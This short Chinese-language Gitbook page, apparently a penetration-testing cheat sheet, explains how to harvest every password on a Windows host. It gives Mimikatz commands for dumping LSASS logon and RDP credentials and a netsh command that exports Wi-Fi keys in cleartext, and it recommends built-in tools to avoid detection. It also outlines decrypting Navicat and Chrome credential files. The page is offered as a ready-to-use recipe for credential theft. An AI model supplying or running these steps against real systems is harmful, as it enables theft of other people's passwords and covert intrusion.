怎么收集主机上的所有有关密码的敏感信息

1. Mimikatz 抓取系统和 RDP 凭证

Mimikatz 是绕过 Windows 安全机制、在内存中抓取明文密码或哈希的旗舰工具

  • 抓取系统登录密码/哈希 (LSASS 内存):

    mimikatz.exe
    privilege::debug
    sekurlsa::logonpasswords
    
  • 抓取 RDP/保存的 Windows 凭证 (Credential Manager):

    mimikatz.exe
    privilege::debug
    sekurlsa::credman
    

2. Wi-Fi 密码抓取

作为渗透测试工程师,我们倾向于使用系统自带的命令来减少被检测的风险。

  • 步骤一:导出所有 Wi-Fi 配置文件

    netsh wlan export profile key=clear folder=C:\Temp
    

    (注意:key=clear 会导出明文密码)

  • 步骤二:提取密码 读取导出的 C:\Temp 目录下的 XML 文件,搜索 <keyMaterial> 标签即可找到明文密码

3. 针对特定软件凭证 (Xshell, Navicat, 浏览器)

对于这些应用软件,通常需要找到对应的开源解密工具,这些工具通常托管在 GitHub 上,专门针对该软件的特定加密算法进行逆向和解密

  • 一般操作流程:
    1. 找到目标软件的配置文件或数据库文件(例如,Navicat 的 .ncx 文件、Chrome 的 Login Data SQLite 文件)
    2. 将文件下载到本地(如果权限允许)
    3. 使用对应的 GitHub 开源解密工具进行解密
Copyright © 版权信息 all right reserved,powered by Gitbook该文件修订时间: 2025-09-27 22:16:00

results matching ""

    No results matching ""